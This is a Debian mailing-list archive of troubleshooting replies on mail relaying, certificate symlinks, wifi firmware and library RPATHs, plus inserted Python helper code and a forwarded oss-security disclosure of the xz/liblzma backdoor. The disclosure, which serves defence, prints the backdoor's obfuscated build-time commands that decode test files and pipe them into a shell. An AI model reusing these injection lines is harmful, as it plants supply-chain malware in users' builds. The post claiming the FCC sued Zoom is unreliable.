> I have a mini PC which just serves up videos. Daily it backs up to an
> attached drive. This happens with a script in /etc/cron.daily, which
> typically emails results to root. In my case it's aliased to me. I have
> OpenSMTPD installed with this config:
>
> ---
>
> #   $OpenBSD: smtpd.conf,v 1.10 2018/05/24 11:40:17 gilles Exp $
>
> # This is the smtpd server system-wide configuration file.
> # See smtpd.conf(5) for more information.
>
> table aliases file:/etc/aliases
> table secrets file:/etc/secrets
>
> listen on localhost
>
> action "relay" relay host smtp+notls://paulf@yosemite.mars.lan:25 auth <secrets>
>
> match from local for any action "relay"
>
> ---
>
> Note: yosemite is my desktop machine; that where I want the mail to be
> sent. "paulf" is a tag in the secrets file. Note that this connection
> between the mini PC (buckaroo) and yosemite should be a plain text
> connection, very simple. My username and password are in the secrets file.
>
> When I attempt to send a test message to check this all works (via swaks or
> mail), I get an error message in the /var/log/mail.log file which says:
>
> "warn: Failed to parse smarthost smtp+notls://paulf@yosemite.mars.lan:25"
>
> Note that the "protocol" doesn't matter. I can use "smtp" alone as the
> protocol, and it still won't parse. And yes, yosemite.mars.lan is in my
> local hosts file.

On the video server, run nslookup and see if it can resolve yosemite.mars.lan.

Looking at the string smtp+notls://paulf@yosemite.mars.lan:25, it
looks more like a url than a hostname. Maybe that is confusing your
mail agent.

Also, I think you should be using *.home.arpa, and not *.lan.
home.arpa is reserved for private use by ICANN and the IETF. I suspect
*.lan is not reserved for private use.

Jeff



Re: sanity check for /etc/ssl/certs?

2024-05-14 Thread Jeffrey Walton
On Tue, May 14, 2024 at 3:10 PM Harald Dunkel  wrote:

> Hi folks,
>
> is there a sanity check for /etc/ssl/certs included in Bookworm?
> I've got one host with some missing symlinks in this directory, eg.
>
> root@dpcl064:/etc/ssl/certs# ls -al *SSL.com*
> ls: cannot access '*SSL.com*': No such file or directory
>

It is hard to say what is going on.

I see them in Debian Unstable:

$ find /etc/ssl/certs -iname '*ssl.com*'
/etc/ssl/certs/SSL.com_TLS_RSA_Root_CA_2022.pem
/etc/ssl/certs/SSL.com_EV_Root_Certification_Authority_RSA_R2.pem
/etc/ssl/certs/SSL.com_TLS_ECC_Root_CA_2022.pem
/etc/ssl/certs/SSL.com_Root_Certification_Authority_RSA.pem
/etc/ssl/certs/SSL.com_Root_Certification_Authority_ECC.pem
/etc/ssl/certs/SSL.com_EV_Root_Certification_Authority_ECC.pem

I don't see anything in Debian's bug reporter about removing ssl.com;
confer, .
And ssl.com is included in Mozilla and Chrome's root program.


> Other hosts show
>
> root@dpcl082:/etc/ssl/certs# ls -al *SSL.com*
> lrwxrwxrwx 1 root root 82 Jul 16  2018
> SSL.com_EV_Root_Certification_Authority_ECC.pem ->
> /usr/share/ca-certificates/mozilla/SSL.com_EV_Root_Certification_Authority_ECC.crt
> lrwxrwxrwx 1 root root 85 Jul 16  2018
> SSL.com_EV_Root_Certification_Authority_RSA_R2.pem ->
> /usr/share/ca-certificates/mozilla/SSL.com_EV_Root_Certification_Authority_RSA_R2.crt
> lrwxrwxrwx 1 root root 79 Jul 16  2018
> SSL.com_Root_Certification_Authority_ECC.pem ->
> /usr/share/ca-certificates/mozilla/SSL.com_Root_Certification_Authority_ECC.crt
> lrwxrwxrwx 1 root root 79 Jul 16  2018
> SSL.com_Root_Certification_Authority_RSA.pem ->
> /usr/share/ca-certificates/mozilla/SSL.com_Root_Certification_Authority_RSA.crt
>
> The files in /usr/share/ca-certificates are available, of course.
> The access rights seem OK. update-ca-certificates or reinstalling
> ca-certificates (with overwrite) didn't solve this problem.
>

Hazarding a guess... Have you upgraded that system over the years? That may
explain why you are seeing old artifacts and dead symlinks.

Maybe you should run `symlinks -r / | grep dangling` to locate dead
symlinks, and then run `symlinks -r -d /` to delete them (once you are
satisfied with the resulting list).

Jeff
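An added example (not from the thread) of the sanity check asked about: it lists dangling symlinks in a certs directory and the enabled entries of a ca-certificates.conf-style file that no link points to, run against a constructed temporary tree. The directory layout and the `!`-disabled line convention follow Debian's ca-certificates package; the Removed_CA and Disabled_CA names are made up.

```python
from __future__ import annotations

import os
import tempfile
from pathlib import Path


def dangling_symlinks(cert_dir: str | os.PathLike) -> list[Path]:
    """Symlinks in cert_dir whose target no longer exists (Path.exists()
    follows the link, Path.is_symlink() does not)."""
    return sorted(p for p in Path(cert_dir).iterdir()
                  if p.is_symlink() and not p.exists())


def enabled_certs(conf_text: str, source_dir: str | os.PathLike) -> set[Path]:
    """Certificates enabled in /etc/ca-certificates.conf: one path relative to
    /usr/share/ca-certificates per line, '#' comments, leading '!' = disabled."""
    enabled: set[Path] = set()
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", "!")):
            continue
        enabled.add((Path(source_dir) / line).resolve())
    return enabled


def missing_links(cert_dir, source_dir, conf_text: str) -> list[Path]:
    """Enabled certificates that no working symlink in cert_dir points to;
    update-ca-certificates normally creates one <name>.pem link per cert."""
    linked = {p.resolve() for p in Path(cert_dir).iterdir()
              if p.is_symlink() and p.exists()}
    return sorted(enabled_certs(conf_text, source_dir) - linked)


def check(cert_dir, source_dir, conf_text: str) -> dict[str, list[str]]:
    """Both findings as plain names relative to their directories."""
    return {
        "dangling": [p.name for p in dangling_symlinks(cert_dir)],
        "missing": [str(p.relative_to(Path(source_dir).resolve()))
                    for p in missing_links(cert_dir, source_dir, conf_text)],
    }


def build_sample_tree(root: Path) -> tuple[Path, Path, str]:
    """Constructed stand-in for /usr/share/ca-certificates, /etc/ssl/certs and
    /etc/ca-certificates.conf with one dead link and one missing link."""
    source = root / "share" / "ca-certificates"
    certs = root / "ssl" / "certs"
    (source / "mozilla").mkdir(parents=True)
    certs.mkdir(parents=True)
    for name in ("SSL.com_Root_Certification_Authority_RSA.crt",
                 "SSL.com_Root_Certification_Authority_ECC.crt",
                 "Disabled_CA.crt"):
        (source / "mozilla" / name).write_text("-----BEGIN CERTIFICATE-----\n")
    # Good link, as update-ca-certificates would create it.
    (certs / "SSL.com_Root_Certification_Authority_RSA.pem").symlink_to(
        source / "mozilla" / "SSL.com_Root_Certification_Authority_RSA.crt")
    # Stale link to a certificate that is no longer shipped (made-up name).
    (certs / "Removed_CA.pem").symlink_to(source / "mozilla" / "Removed_CA.crt")
    conf = ("# comment\n"
            "mozilla/SSL.com_Root_Certification_Authority_RSA.crt\n"
            "mozilla/SSL.com_Root_Certification_Authority_ECC.crt\n"
            "!mozilla/Disabled_CA.crt\n")
    return certs, source, conf


def demo() -> dict[str, list[str]]:
    """Run the check against the constructed tree in a temporary directory."""
    with tempfile.TemporaryDirectory() as tmp:
        return check(*build_sample_tree(Path(tmp)))


if __name__ == "__main__":
    print(demo())
```

On a real Debian host the same check is `check("/etc/ssl/certs", "/usr/share/ca-certificates", Path("/etc/ca-certificates.conf").read_text())`.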


Re: OT: Top Posting

2024-05-14 Thread Jeffrey Walton
On Tue, May 14, 2024 at 2:40 PM Richard  wrote:

> You really must think of yourself as being the epitome of human creation.
> I don't see any use in continuing this nonsense. If you don't have anything
> relevant to say, this case is closed for me.
>

Who are you talking about? There are two people in the reply below.

Jeff


> On Tue., 14 May 2024 at 16:55, gene heskett <
> ghesk...@shentel.net>:
>
>> On 5/14/24 10:09, Richard wrote:
>> > Just because something isn't an official ISO standard doesn't mean it's
>> > not standard behavior. And how it relates to this mailing list? It's
>> > called a setting.
>> >
>> No it's not, it's your refusal to use the down arrow in your reply editor
>> to put your reply after the question. It really is that simple. If your
>> choice of email agents cannot do that, it's time to switch to an agent
>> that can. There are dozens of them.
>>
>> > On Tue., 14 May 2024 at 15:57, Loris Bennett
>> > mailto:loris.benn...@fu-berlin.de>>:
>> >
>> > Hi Richard,
>> >
>> > Richard mailto:rrosn...@gmail.com>> writes:
>> >
>> >  > "Top posting" (writing the answer above the text that's being
>> replied
>> >  > to) is literally industry standard behavior.
>> >
>> > Can you provide a link to the standard you are referring to?
>> >
>> > Assuming such a standard exists, how would it apply to this
>> newsgroup?
>> >
>> > [snip (51 lines)]
>> >
>> > Cheers,
>> >
>> > Loris
>>
>> Cheers, Gene Heskett, CET.
>>
>


Re: Wifi getting disconnected randomly

2024-05-10 Thread Jeffrey Walton
On Fri, May 10, 2024 at 11:18 AM Max Nikulin  wrote:

> On 10/05/2024 22:09, Jeffrey Walton wrote:
> > On Fri, May 10, 2024 at 11:05 AM Max Nikulin wrote:
> > On 10/05/2024 06:07, Jeffrey Walton wrote:
> >  > On Thu, May 9, 2024 at 5:44 PM Unni wrote:
> >  > [  278.360447] iwlwifi :09:00.0: Microcode SW error
> detected.
> >  > Restarting 0x0.
> >  > [  278.360571] iwlwifi :09:00.0: Loaded firmware version:
> >  > 72.daa05125.0 cc-a0-72.ucode
> > [...]
> >  > Install the latest UEFI firmware for the machine, and then re-run
> > the tests.
> >
> > I do not mind that it is a useful suggestion in general and should be
> > followed, but I am curious if it has ever helped you in specific
> cases
> > of intel wifi cards.
> >
> > My bad. I was talking about the manufacturer's UEFI firmware; not a
> > linux-firmware package.
>
> I am not trying to dispute your suggestion, I had a hope to get a data
> point with a success story.
>

Hi Max.

Sorry to go off the list.

In 2006 I was doing sysadmin work for the Nuclear Energy Institute. NEI
performed a hardware refresh, and supplied ~50 employees with new Dell
laptops. I don't recall the model, but they had integrated Intel wifi. The
laptops would connect via wifi, and disconnect after about 10 minutes. Dell
support told us we needed to update the BIOS or UEFI. It fixed the problem.

About 6 months ago, I bought a used Intel NUC model NUC5PPYB. It was
running Fedora 39 at the time. A `sudo reboot && exit` over SSH would cause
the machine to hang on shutdown. I had to walk over to the machine and
cycle the power. The NUC had UEFI from 2015. I updated to the 2022 version
of the UEFI (version PYBSWCEL.86A.0081.2022.0823.1419), and the hang on
reboot was fixed. Apparently there was some problem around ACPI.

Jeff


Re: Wifi getting disconnected randomly

2024-05-10 Thread Jeffrey Walton
On Fri, May 10, 2024 at 11:05 AM Max Nikulin  wrote:

> On 10/05/2024 06:07, Jeffrey Walton wrote:
> > On Thu, May 9, 2024 at 5:44 PM Unni wrote:
> > [  278.360447] iwlwifi :09:00.0: Microcode SW error detected.
> > Restarting 0x0.
> > [  278.360571] iwlwifi :09:00.0: Loaded firmware version:
> > 72.daa05125.0 cc-a0-72.ucode
> [...]
> > Install the latest UEFI firmware for the machine, and then re-run the
> tests.
>
> I do not mind that it is a useful suggestion in general and should be
> followed, but I am curious if it has ever helped you in specific cases
> of intel wifi cards.
>

My bad. I was talking about the manufacturer's UEFI firmware; not a
linux-firmware package.

Jeff


Re: Wifi getting disconnected randomly

2024-05-09 Thread Jeffrey Walton
On Thu, May 9, 2024 at 5:44 PM Unni  wrote:

> Hello,
>
> Wifi is getting disconnected randomly on debian. dmesg shows
>
>
> --
>
> [  278.360346] iwlwifi :09:00.0: Queue 5 is stuck 8 21
> [  278.360447] iwlwifi :09:00.0: Microcode SW error detected.
> Restarting 0x0.
> [  278.360566] iwlwifi :09:00.0: Start IWL Error Log Dump:
> [  278.360568] iwlwifi :09:00.0: Transport status: 0x004A, valid: 6
> [  278.360571] iwlwifi :09:00.0: Loaded firmware version:
> 72.daa05125.0 cc-a0-72.ucode
> [  278.360573] iwlwifi :09:00.0: 0x0084 | NMI_INTERRUPT_UNKNOWN
> [  278.360576] iwlwifi :09:00.0: 0x22F0 | trm_hw_status0
> [  278.360578] iwlwifi :09:00.0: 0x0001 | trm_hw_status1
> [  278.360579] iwlwifi :09:00.0: 0x004FBE16 | branchlink2
> [  278.360581] iwlwifi :09:00.0: 0x004F23FE | interruptlink1
> [  278.360583] iwlwifi :09:00.0: 0x004F23FE | interruptlink2
> [  278.360585] iwlwifi :09:00.0: 0x5CEA | data1
> [  278.360587] iwlwifi :09:00.0: 0x0100 | data2
> [  278.360589] iwlwifi :09:00.0: 0x | data3
> [  278.360590] iwlwifi :09:00.0: 0x86C0496C | beacon time
> [  278.360592] iwlwifi :09:00.0: 0x72E106A0 | tsf low
> [  278.360594] iwlwifi :09:00.0: 0x00E2 | tsf hi
> [  278.360596] iwlwifi :09:00.0: 0x | time gp1
> [  278.360598] iwlwifi :09:00.0: 0x1009BFB7 | time gp2
> [  278.360600] iwlwifi :09:00.0: 0x0001 | uCode revision type
> [  278.360601] iwlwifi :09:00.0: 0x0048 | uCode version major
> [  278.360603] iwlwifi :09:00.0: 0xDAA05125 | uCode version minor
> [  278.360605] iwlwifi :09:00.0: 0x0340 | hw version
> [  278.360607] iwlwifi :09:00.0: 0x00C89000 | board version
> [  278.360609] iwlwifi :09:00.0: 0x8045FC0B | hcmd
> [  278.360610] iwlwifi :09:00.0: 0x0002 | isr0
> [  278.360612] iwlwifi :09:00.0: 0x | isr1
> [  278.360614] iwlwifi :09:00.0: 0x08F2 | isr2
> [  278.360616] iwlwifi :09:00.0: 0x00C3038C | isr3
> [  278.360618] iwlwifi :09:00.0: 0x | isr4
> [  278.360619] iwlwifi :09:00.0: 0x0507001C | last cmd Id
> [  278.360621] iwlwifi :09:00.0: 0x5CEA | wait_event
> [  278.360623] iwlwifi :09:00.0: 0x0080 | l2p_control
> [  278.360625] iwlwifi :09:00.0: 0x0020 | l2p_duration
> [  278.360627] iwlwifi :09:00.0: 0x003F | l2p_mhvalid
> [  278.360629] iwlwifi :09:00.0: 0x0080 | l2p_addr_match
> [  278.360630] iwlwifi :09:00.0: 0x0009 | lmpm_pmg_sel
> [  278.360632] iwlwifi :09:00.0: 0x | timestamp
> [  278.360634] iwlwifi :09:00.0: 0x70D0 | flow_handler
> [  278.360680] iwlwifi :09:00.0: Start IWL Error Log Dump:
> [  278.360682] iwlwifi :09:00.0: Transport status: 0x004A, valid: 7
> [  278.360684] iwlwifi :09:00.0: 0x2066 | NMI_INTERRUPT_HOST
> [  278.360686] iwlwifi :09:00.0: 0x | umac branchlink1
> [  278.360688] iwlwifi :09:00.0: 0x80455E3C | umac branchlink2
> [  278.360690] iwlwifi :09:00.0: 0x80472146 | umac interruptlink1
> [  278.360692] iwlwifi :09:00.0: 0x80472146 | umac interruptlink2
> [  278.360693] iwlwifi :09:00.0: 0x0100 | umac data1
> [  278.360695] iwlwifi :09:00.0: 0x80472146 | umac data2
> [  278.360697] iwlwifi :09:00.0: 0x | umac data3
> [  278.360699] iwlwifi :09:00.0: 0x0048 | umac major
> [  278.360701] iwlwifi :09:00.0: 0xDAA05125 | umac minor
> [  278.360702] iwlwifi :09:00.0: 0x1009BFB5 | frame pointer
> [  278.360704] iwlwifi :09:00.0: 0xC0886264 | stack pointer
> [  278.360706] iwlwifi :09:00.0: 0x00E8019C | last host cmd
> [  278.360708] iwlwifi :09:00.0: 0x | isr status reg
> [  278.360722] iwlwifi :09:00.0: IML/ROM dump:
> [  278.360724] iwlwifi :09:00.0: 0x0003 | IML/ROM error/state
> [  278.360738] iwlwifi :09:00.0: 0x578F | IML/ROM data1
> [  278.360752] iwlwifi :09:00.0: 0x0080 | IML/ROM WFPM_AUTH_KEY_0
> [  278.360761] iwlwifi :09:00.0: Fseq Registers:
> [  278.360765] iwlwifi :09:00.0: 0x6000 | FSEQ_ERROR_CODE
> [  278.360770] iwlwifi :09:00.0: 0x00290021 | FSEQ_TOP_INIT_VERSION
> [  278.360775] iwlwifi :09:00.0: 0x00050008 | FSEQ_CNVIO_INIT_VERSION
> [  278.360780] iwlwifi :09:00.0: 0xA503 | FSEQ_OTP_VERSION
> [  278.360785] iwlwifi :09:00.0: 0x8003 | FSEQ_TOP_CONTENT_VERSION
> [  278.360790] iwlwifi :09:00.0: 0x4552414E | FSEQ_ALIVE_TOKEN
> [  278.360794] iwlwifi :09:00.0: 0x00100530 | FSEQ_CNVI_ID
> [  278.360799] iwlwifi :09:00.0: 0x0532 | FSEQ_CNVR_ID
> [  278.360804] iwlwifi :09:00.0: 0x00100530 | CNVI_AUX_MISC_CHIP
> [  278.360811] iwlwifi :09:00.0: 0x0532 | CNVR_AUX_MISC_CHIP
> [  278.360818] iwlwifi :09:00.0: 0x05B0905B |
> CNVR_SCU_SD_REGS_SD_REG_DIG_DCDC_VTRIM
> [  278.360825] iwlwifi :09:00.0: 0x025B |
> CNVR_SCU_SD_REGS_SD_REG_ACTIVE_VDIG_MIRROR
> --
> unni-debian:~# cat 

Re: Lightweight Emacs for container?

2024-05-06 Thread Jeffrey Walton
On Mon, May 6, 2024 at 6:45 PM Dr. Jennifer Nussbaum 
wrote:

> I usually use Emacs on full-blown Debian distributions, so I don't pay
> much attention to how large it is. But I'm now starting to
> play around with lightweight LXC containers, obviously headless, and would
> like to keep using Emacs in these, but just for basic
> text editing and so forth, I don't need a whole IDE environment. But to my
> surprise, even emacs-nox is a gigantic installation,
> that even wants to pull in MySQL, for heaven's sake.
>
> Is there some package, or a simple workaround, that will allow me to use a
> basic Emacs without all the cruft?
>

To expand on what Stefan said, see
<https://www.emacswiki.org/emacs/EmacsImplementations>.

And you can build it from sources, and really leave out the stuff you don't
want: .

Jeff


Re: Zoom in the official repo is outdated

2024-04-24 Thread Jeffrey Walton
On Wed, Apr 24, 2024 at 7:13 PM Van Snyder  wrote:

> On Wed, 2024-04-24 at 16:42 -0300, Luiz Romário Santana Rios wrote:
>
> Hello,
>
>
> (Please cc me when replying as I'm not subscribed to the list)
>
>
> Earlier this month, I noticed I was no longer able to login to Zoom
>
> meetings using the client installed from the Debian repos. In order to
>
> join meetings, I had to uninstall it then install the Flatpak Zoom package.
>
>
> I think it should either be updated or outright removed in favor of the
>
> Flatpak version. What do you think? Should I report a bug?
>
>
> I was expected to use zoom for a meeting. The zoom app didn't work at all
> in Debian 10, completely refusing even to open a window. I at first started
> with the zoom support in Firefox, but it didn't have a button to select
> high resolution for the camera, so the meeting host asked me to run in the
> app.
>
> I re-opened the session on a different computer that is running Debian 12.
> The app worked OK on that computer.
>

Related, if you control the venue, then you might consider using Jitsi.
Jitsi is open source, and it does not have the obscene terms of service
that companies like Google, Microsoft and Zoom push onto people using their
service. With Jitsi, your meeting data is yours. It is not used internally
for other products, and it is not shared with partners like the Big Tech
companies do.

And last but not least, Zoom is not trustworthy. The company will lie to
users until the cows come home. It was so bad the FCC had to sue them to
get the company to stop. That's saying something when the FCC moves against
a company. The FCC is captured, and the regulatory body rarely moves
against any company.

Jeff


Re: Debian@IBMx3550

2024-04-23 Thread Jeffrey Walton
On Tue, Apr 23, 2024 at 5:35 PM Greg  wrote:

> Hi there,
>
> I got refurb IBM x3550 M3 7944 server and I'm a bit lost. Is there any
> Linux/Debian software (some gui would be nice) to monitor fan speed,
> temperatures, voltages, disks.. ?
>

I believe the package you are looking for is lm-sensors.

Jeff


Re: Subject: Glitchy sound in Steam games after hard drive upgrade

2024-04-22 Thread Jeffrey Walton
On Mon, Apr 22, 2024 at 5:03 AM Charlie Gibbs  wrote:

> I should probably be posting this to the Steam forums, but
> most of the denizens there are Windows people so I might be
> better off letting you Debian gurus have a go at it first.
>
> TL;DR: Copying an existing /home into a fresh Debian installation
> causes audio in Steam games to glitch - but all other sound is OK.
>
> Full description:
>
> I have a machine in the living room that stores MP3s and videos
> and serves them to other machines on our network as well as playing
> them locally on our TV's big screen.  I also play a few Steam games
> (e.g. Portal) on it.  It's a 2007-vintage machine, but it has 8GB
> of RAM and enough CPU power to do the job, and runs the latest
> version of Bookworm.
>
> Recently I decided to upgrade its storage capacity, and replaced
> its 500GB hard drive (which was pretty large at the time I bought
> it) with a 4TB drive.  I did an install from scratch using a
> network install CD, then copied my /home partition (using rsync)
> from the old drive.  Everything works great with one exception:
> when I fire up Portal the sound gets glitches about once a second.
> This only happens with Steam games; I can play MP3s and videos
> with mpv and the sound is perfect, as it is when watching YouTube
> videos.  If I swap the old drive back in everything is fine.
>
> Obviously my Steam programs and configuration files are in my
> home directory, since the updated system comes up icons and all
> without re-installing Steam, and can find everything it needs to
> run the games.  But perhaps there are a few files somewhere else
> (/usr?) containing information critical to audio for Steam.
>
> Any ideas?
>

What are the old and new hard drive model numbers and specs?

If the old hard drive was spinning rust, it is acceptable to replace it
with a solid state drive. I did it several times in the past. But nowadays
a new machine usually (always?) comes with a SSD, so you usually don't need
to upgrade for performance reasons.


Re: inconsistency in the symlinks under /etc/systemd

2024-04-10 Thread Jeffrey Walton
On Wed, Apr 10, 2024 at 7:00 AM Vincent Lefevre  wrote:
>
> On one machine, I have
>
> lrwxrwxrwx 1 root root 35 2023-10-07 13:43:24 
> /etc/systemd/system/sockets.target.wants/dm-event.socket -> 
> /lib/systemd/system/dm-event.socket
>
> and on another one, I have
>
> lrwxrwxrwx 1 root root 39 2024-01-05 16:54:09 
> /etc/systemd/system/sockets.target.wants/dm-event.socket -> 
> /usr/lib/systemd/system/dm-event.socket
>
> These symlinks were created at Debian installation time, and in
> both cases, the dmeventd version is 2:1.02.196-1+b1.
>
> Shouldn't the system ensure that symlinks are consistent on different
> machines (even though the above symlinks are equivalent), for instance
> to ease the comparison of configurations between machines?
>
> For instance, shouldn't usr-is-merged convert the symlinks to a
> canonical path?

Be careful of fiddling with the Systemd symlinks. If you convert the
relative ones to absolute ones, then the machine will fail to boot.

Jeff



Re: Debian 12.5: pigz 2.6-1 fails with error message (Upstream issue 111)

2024-04-02 Thread Jeffrey Walton
On Tue, Apr 2, 2024 at 6:24 PM Chung Jonathan  wrote:
>
> Dear Franco Martelli, dear Thomas Schmitt,
>
> Sorry for the potential duplication. This mail should now also go to the list.
>
> I believe I found the problem which was on my side. I do have libz.so.1.3, 
> since I manually compiled grpc on my machine and this also uses a newer 
> version of zlib apparently. So this is not a Debian problem but rather 
> specific to my setup. A clean install in a VM indeed works as expected.
> Do you still think a bug report is worth it?

Your problem is one that plagues Linux. You compile and link against
one version of a library, and then you runtime link against another
version. This should have been fixed for users a long time ago, but
the folks responsible leave users to suffer it. I consider it a
security bug since essentially random libraries are being loaded at
runtime.

To fix the problem yourself, add an RPATH to your LDFLAGS when
building your program:

-Wl,-rpath=/path/to/expected/libz -Wl,--enable-new-dtags

The loader will encounter the RPATH when loading your executable, and
load the correct library for your program.

Jeff



Re: making Debian secure by default

2024-04-01 Thread Jeffrey Walton
On Mon, Apr 1, 2024 at 5:55 PM Charles Curley wrote:
>
> On Mon, 1 Apr 2024 19:00:29 +
> Andy Smith  wrote:
>
> > In my view a great example of the "people other than me just need to
> > get good" fallacy merged with the group of people predisposed to
> > hate systemd.
> >
> > It could have been any direct or indirect dependency of sshd here.
> > I'm quite sure almost none of them have the required resources and
> > processes to detect something like this.
>
> Easy, now. No-one is attacking systemd, and I don't think anyone wanted
> to start a systemd war. This could also have happened under System V
> initialization.
>
> I have no doubt that this sort of thing has happened in the past, and I
> fully expect it will happen again in the future. However, the defect
> has been caught and repaired. The system for dealing with
> vulnerabilities is working, if not perfectly. The question now is: what
> lessons can we learn from it.

++.

Right now, Linux does not have a classification system to identify
critical projects, or help with resources for those projects. I don't
like using the word "Linux", but I don't know how to describe the
ecosystem.

For critical projects, I'm talking about the cURL's, OpenSSL's, OpenSSH's,
Wget's and Xz's of the world. These are critical to a base Linux
system. When they have a memory bug or a CVE, action needs to be
taken. The free software world does not even know what the list is.
(And I'm not talking about the other useless fodder that shows up in
repos).

Other vulnerable projects include ncurses and libnettle. Ncurses is
run by Thomas Dickey (https://invisible-island.net/). libnettle is run
by Niels Möller (https://www.lysator.liu.se/~nisse/nettle/). Both are
one-man shows with no continuity plans. Dickey does not even run a
public version control system. You have to download his release
tarballs. There's nothing to make pull requests against. If Dickey or
Möller got hit by a bus crossing the street, there would be problems
for years.

Selling support for critical projects does not seem to work. I seem to
recall Werner Koch of GnuPG roughing it when relying on support
contracts to fund a project.

So one of the first steps would be to identify critical projects,
shore up their governance, and then help the project with additional
resources, like a grant and trusted eyeballs.

Jeff



Re: making Debian secure by default

2024-04-01 Thread Jeffrey Walton
On Mon, Apr 1, 2024 at 4:34 AM Nate Bargmann  wrote:
>
> * On 2024 31 Mar 20:46 -0500, Andy Smith wrote:
> > In the xz case the further you go looking for a root cause the wider
> > the implications are:
> >
> > Q: Why was there a back door in sshd?
> > A: Because some malicious code was linked to it.
> >
> > Q: How did malicious code get linked to it?
> > A: Its lzma dependency was compromised.
>
> From what I have read, lzma is not a direct dependency of openssh.  It
> turns out that it lzma is a dependency of libsystemd and that
> relationship affected openssh.
>
> Jacob Bachmeyer in analysis
> (https://lists.gnu.org/archive/html/automake/2024-04/msg0.html)
> says:
>
> Lastly on this topic, some of the blame for this needs to fall on the
> systemd maintainers and their "katamari" architecture. There is no good
> reason for notifications of daemon startup to pull in liblzma, but using
> libsystemd for that purpose does exactly that, and ended up getting
> xz-utils targeted as a means of getting to sshd without the OpenSSH
> maintainers noticing.
>
> End quote.

It looks like SELinux is a larger problem than Systemd:
. Systemd
already dropped the liblzma dependency, but they did it for a smaller
initram image, and not to reduce attack surface.

Jeff



Re: [oss-security] backdoor in upstream xz/liblzma leading to ssh server compromise

2024-03-30 Thread Jeffrey Walton
It looks like more analysis has revealed this is a RCE with the
payload in the modulus of a public key: "The payload is extracted from
the N value (the public key) passed to RSA_public_decrypt, checked
against a simple fingerprint, and decrypted with a fixed ChaCha20 key
before the Ed448 signature verification..." Also see
<https://www.openwall.com/lists/oss-security/2024/03/30/36>.

On Fri, Mar 29, 2024 at 1:52 PM Jeffrey Walton  wrote:
>
> Seems relevant since Debian adopted xz about 10 years ago.
>
> -- Forwarded message -
> From: Andres Freund 
> Date: Fri, Mar 29, 2024 at 12:10 PM
> Subject: [oss-security] backdoor in upstream xz/liblzma leading to ssh
> server compromise
> To: 
>
> Hi,
>
> After observing a few odd symptoms around liblzma (part of the xz package) on
> Debian sid installations over the last weeks (logins with ssh taking a lot of
> CPU, valgrind errors) I figured out the answer:
>
> The upstream xz repository and the xz tarballs have been backdoored.
>
> At first I thought this was a compromise of debian's package, but it turns out
> to be upstream.
>
> == Compromised Release Tarball ==
>
> One portion of the backdoor is *solely in the distributed tarballs*. For
> easier reference, here's a link to debian's import of the tarball, but it is
> also present in the tarballs for 5.6.0 and 5.6.1:
>
> https://salsa.debian.org/debian/xz-utils/-/blob/debian/unstable/m4/build-to-host.m4?ref_type=heads#L63
>
> That line is *not* in the upstream source of build-to-host, nor is
> build-to-host used by xz in git.  However, it is present in the tarballs
> released upstream, except for the "source code" links, which I think github
> generates directly from the repository contents:
>
> https://github.com/tukaani-project/xz/releases/tag/v5.6.0
> https://github.com/tukaani-project/xz/releases/tag/v5.6.1
>
>
> This injects an obfuscated script to be executed at the end of configure. This
> script is fairly obfuscated and data from "test" .xz files in the repository.
>
>
> This script is executed and, if some preconditions match, modifies
> $builddir/src/liblzma/Makefile to contain
>
> am__test = bad-3-corrupt_lzma2.xz
> ...
> am__test_dir=$(top_srcdir)/tests/files/$(am__test)
> ...
> sed rpath $(am__test_dir) | $(am__dist_setup) >/dev/null 2>&1
>
>
> which ends up as
> ...; sed rpath ../../../tests/files/bad-3-corrupt_lzma2.xz | tr "
>   \-_" " _\-" | xz -d | /bin/bash >/dev/null 2>&1; ...
>
> Leaving out the "| bash" that produces
>
> Hello
> #��Z�.hj�
> eval `grep ^srcdir= config.status`
> if test -f ../../config.status;then
> eval `grep ^srcdir= ../../config.status`
> srcdir="../../$srcdir"
> fi
> export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c
> +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) &&
> head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head
> -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) &&
> head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head
> -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) &&
> head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head
> -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) &&
> head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head
> -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) &&
> head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head
> -c +1024 >/dev/null) && head -c +724)";(xz -dc
> $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c
> +31265|tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131"
> "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh
> World
>
> After de-obfuscation this leads to the attached injected.txt.
>
>
> == Compromised Repository ==
>
> The files containing the bulk of the exploit are in an obfuscated form in
>   tests/files/bad-3-corrupt_lzma2.xz
>   tests/files/good-large_compressed.lzma
> committed upstream. They were initially added in
> https://github.com/tukaani-project/xz/commit/cf44e4b7f5dfdbf8c78aef377c10f71e274f63c0
>
> Note that the files were not even used for any "tests" in 5.6.0.
>
>
> Subsequently the injected code (more about that below) caused valgrind 
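The forwarded report's first finding is that the injected m4/build-to-host.m4 was present only in the distributed release tarballs and not in the upstream git tree. One cheap supply-chain check that would surface exactly that is to diff a release tarball against an archive produced from the tagged VCS tree. The following is an added example, not code from the advisory or the xz project; the two tarballs it compares are constructed in memory, and the file names in them are made up for the demo.

```python
"""Compare a release tarball against an archive made from the VCS tree.

Added example: lists members that exist only in the release tarball, only in
the VCS archive (e.g. `git archive --format=tar <tag>`), or differ in content.
"""
import hashlib
import io
import tarfile
from typing import Dict, List


def tar_digests(tar_bytes: bytes) -> Dict[str, str]:
    """Map each regular-file member (top-level directory stripped) to its SHA-256."""
    digests = {}
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:*") as tar:
        for member in tar.getmembers():
            if not member.isfile():
                continue
            # Release tarballs and `git archive` both prefix members with "pkg-x.y.z/".
            path = member.name.split("/", 1)[1] if "/" in member.name else member.name
            data = tar.extractfile(member).read()
            digests[path] = hashlib.sha256(data).hexdigest()
    return digests


def compare_tarballs(release: bytes, vcs: bytes) -> Dict[str, List[str]]:
    """Report files only in the release, only in the VCS archive, and changed between them."""
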